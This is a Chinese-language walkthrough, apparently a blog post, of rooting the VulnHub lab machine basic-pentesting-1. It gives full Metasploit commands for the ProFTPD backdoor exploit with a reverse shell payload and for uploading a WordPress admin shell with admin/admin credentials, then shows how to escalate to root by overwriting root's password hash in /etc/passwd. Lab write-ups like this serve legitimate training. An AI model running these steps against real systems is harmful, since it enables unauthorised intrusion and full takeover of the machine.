BASIC-PENTESTING-1 靶机提权

 

basic-pentesting-1

https://www.vulnhub.com/entry/basic-pentesting-1,216/

获取ip地址

BASIC-PENTESTING-1 靶机提权_第1张图片

端口扫描,服务识别

BASIC-PENTESTING-1 靶机提权_第2张图片

根据服务版本搜索相关漏洞

BASIC-PENTESTING-1 靶机提权_第3张图片

通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有

BASIC-PENTESTING-1 靶机提权_第4张图片

于是使用msf 搜索漏洞模块并利用

BASIC-PENTESTING-1 靶机提权_第5张图片

use exploit/unix/ftp/proftpd_133c_backdoor

set rhosts 192.168.88.197

set lhost 192.168.88.174

set payload cmd/unix/reverse

exploit

BASIC-PENTESTING-1 靶机提权_第6张图片

直接获得root权限。

BASIC-PENTESTING-1 靶机提权_第7张图片

当然还有一个80端口,我们也可以尝试从web去突破

BASIC-PENTESTING-1 靶机提权_第8张图片

尝试发现一些目录

dirb http://192.168.88.197

在目录/secret/ 下是wordpress 网站

BASIC-PENTESTING-1 靶机提权_第9张图片

尝试访问,发现存在页面重定向

BASIC-PENTESTING-1 靶机提权_第10张图片

BASIC-PENTESTING-1 靶机提权_第11张图片

将网站ip 域名 写入本地hosts 文件,重新访问网站

BASIC-PENTESTING-1 靶机提权_第12张图片

熟悉的界面

BASIC-PENTESTING-1 靶机提权_第13张图片

直接进入后台登录界面

BASIC-PENTESTING-1 靶机提权_第14张图片

直接admin、admin 弱口令进入后台管理界面,免去了爆破的麻烦!

BASIC-PENTESTING-1 靶机提权_第15张图片

在获得访问权限的前提下通过msf 上传 shellcode

 

use exploit/unix/webapp/wp_admin_shell_upload

set lhost 192.168.88.174

set rhost 192.168.88.197

set targeturi /secret/

set username admin

set password admin

exploit

BASIC-PENTESTING-1 靶机提权_第16张图片

可以看到成功上传了php后门,并获得web权限

BASIC-PENTESTING-1 靶机提权_第17张图片

接下来提权

可以使用linuxprivchecker: https://www.securitysift.com/download/linuxprivchecker.py

具体细节可以参考:https://www.freebuf.com/articles/system/129549.html

meterpreter > edit /etc/passwd meterpreter 下的edit 类似vim ,并且我们可以编辑/etc/psswd

root:x:0:0:root:/root:/bin/bash 第二位x 是密码占位符,密码加密存储在/etc/shadow,

我们可以假设,此处x 位 密码存在,那么root 就会默认密码为x位。就不会去读取/etc/shadow.

BASIC-PENTESTING-1 靶机提权_第18张图片

生成密码

openssl passwd -1

密码:admin

$1$ke/.AFq7$ykvmZ9loFhFpsOCZfJ84q1

BASIC-PENTESTING-1 靶机提权_第19张图片

用生成的密码替换 root的密码

:wq! 保存

BASIC-PENTESTING-1 靶机提权_第20张图片

shell

进入完整性shell

python -c ‘import pty; pty.spawn(“/bin/bash”)’

su root

输入密码 admin

获取root权限

BASIC-PENTESTING-1 靶机提权_第21张图片

个人博客:www.payload.com.cn

你可能感兴趣的:(BASIC-PENTESTING-1 靶机提权)